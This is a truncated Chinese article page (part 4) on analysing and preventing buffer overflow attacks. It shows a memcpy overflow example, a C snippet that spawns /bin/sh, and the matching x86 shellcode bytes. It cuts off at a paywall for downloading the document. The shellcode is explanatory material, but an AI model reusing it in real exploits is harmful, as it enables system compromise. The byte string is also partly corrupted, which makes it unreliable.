缓冲区溢出攻击的分析及防范策略(4)

时间:2025-03-11

网络 电子商务 编程

低地址

图1 堆栈结构图

例如,调用以下函数时

Void f(char *src)

{ char dest[4];

memcpy(dest, src,12);

}

堆栈及变量的位置如图2所示:

图2 堆栈及位置的变量图 C2级操作系统提供了进程空间的隔离机制,因此,利用缓冲区溢出攻击

{

char *str[2]={‖/bin/sh‖,0};

exec (―/bin/sh‖,str,0);

}

编译后反编译,并加以整理,得到与以上程序等价的机器码:

―\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00‖

―\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80‖

―\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xdl\xff\xff‖

―\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3‖

事例程序如下:

/ test /

char shellcode[]=

{―\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00‖

缓冲区溢出攻击的分析及防范策略(4).doc 将本文的Word文档下载到电脑

精彩图片

热门精选

大家正在看

× 游客快捷下载通道(下载后可以自由复制和排版)

限时特价:7 元/份 原价:20元

支付方式:

开通VIP包月会员 特价:29元/月

注:下载文档有可能“只有目录或者内容不全”等情况,请下载之前注意辨别,如果您已付费且无法下载或内容有问题,请联系我们协助你处理。
微信:fanwen365 QQ:370150219